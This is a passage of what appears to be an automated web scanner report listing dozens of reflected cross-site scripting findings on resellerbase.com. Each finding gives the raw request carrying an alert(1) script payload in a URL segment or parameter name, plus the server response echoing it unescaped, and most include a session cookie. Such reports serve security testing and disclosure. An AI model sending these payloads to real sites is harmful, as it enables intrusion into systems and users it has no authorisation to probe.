Date: Wed, 17 Nov 2010 23:21:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2346843<script>alert(1)</script>e4d3052b05b/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1865. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 62a7c<script>alert(1)</script>c2f162597bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes62a7c<script>alert(1)</script>c2f162597bb/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes62a7c<script>alert(1)</script>c2f162597bb/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1866. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78d71<script>alert(1)</script>fc51722b8b5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos78d71<script>alert(1)</script>fc51722b8b5/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos78d71<script>alert(1)</script>fc51722b8b5/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1867. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload faa4c<script>alert(1)</script>98635043a58 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/imagesfaa4c<script>alert(1)</script>98635043a58/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/imagesfaa4c<script>alert(1)</script>98635043a58/rating/ was not found on this server.</p>
...[SNIP]...

2.1868. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload ea6b3<script>alert(1)</script>34d453db06e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/ratingea6b3<script>alert(1)</script>34d453db06e/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/ratingea6b3<script>alert(1)</script>34d453db06e/ was not found on this server.</p>
...[SNIP]...

2.1869. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2ae58<script>alert(1)</script>7f506c4521a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/?2ae58<script>alert(1)</script>7f506c4521a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/?2ae58<script>alert(1)</script>7f506c4521a=1 was not found on this server.</p>
...[SNIP]...

2.1870. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d868c<script>alert(1)</script>84e2a7b949d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild868c<script>alert(1)</script>84e2a7b949d/23/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild868c<script>alert(1)</script>84e2a7b949d/23/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1871. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df3ea<script>alert(1)</script>583a5f36a21 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23df3ea<script>alert(1)</script>583a5f36a21/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23df3ea<script>alert(1)</script>583a5f36a21/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1872. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 381cb<script>alert(1)</script>d69913df9cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes381cb<script>alert(1)</script>d69913df9cc/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes381cb<script>alert(1)</script>d69913df9cc/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1873. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7d2ce<script>alert(1)</script>ed8e236e75f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos7d2ce<script>alert(1)</script>ed8e236e75f/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos7d2ce<script>alert(1)</script>ed8e236e75f/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1874. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fb45b<script>alert(1)</script>47b25d85fcd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/imagesfb45b<script>alert(1)</script>47b25d85fcd/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/imagesfb45b<script>alert(1)</script>47b25d85fcd/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.1875. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 43dc7<script>alert(1)</script>ba1ccbfc722 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating43dc7<script>alert(1)</script>ba1ccbfc722/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating43dc7<script>alert(1)</script>ba1ccbfc722/3half.gif was not found on this server.</p>
...[SNIP]...

2.1876. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 7eb3e<script>alert(1)</script>91efcaeafa0 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/3half.gif7eb3e<script>alert(1)</script>91efcaeafa0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/3half.gif7eb3e<script>alert(1)</script>91efcaeafa0 was not found on this server.</p>
...[SNIP]...

2.1877. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2bf61<script>alert(1)</script>8e87fe98bb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating/3half.gif?2bf61<script>alert(1)</script>8e87fe98bb9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images/rating/3half.gif?2bf61<script>alert(1)</script>8e87fe98bb9=1 was not found on this server.</p>
...[SNIP]...

2.1878. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53edc<script>alert(1)</script>7e9382b82f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail53edc<script>alert(1)</script>7e9382b82f4/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail53edc<script>alert(1)</script>7e9382b82f4/23/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1879. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c9de3<script>alert(1)</script>59c27e7c7a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23c9de3<script>alert(1)</script>59c27e7c7a7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23c9de3<script>alert(1)</script>59c27e7c7a7/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1880. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93b99<script>alert(1)</script>4caa143d723 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes93b99<script>alert(1)</script>4caa143d723/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes93b99<script>alert(1)</script>4caa143d723/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1881. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b51c1<script>alert(1)</script>0be91638216 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmosb51c1<script>alert(1)</script>0be91638216/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmosb51c1<script>alert(1)</script>0be91638216/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1882. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 96b38<script>alert(1)</script>40b66577c74 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images96b38<script>alert(1)</script>40b66577c74/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/themes/kosmos/images96b38<script>alert(1)</script>40b66577c74/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1883. http://www.resellerbase.com/detail/23/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/23/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 662b8<script>alert(1)</script>d7b34cffffc was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/themes/kosmos/images/rating662b8<script>alert(1)</script>d7b34cffffc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
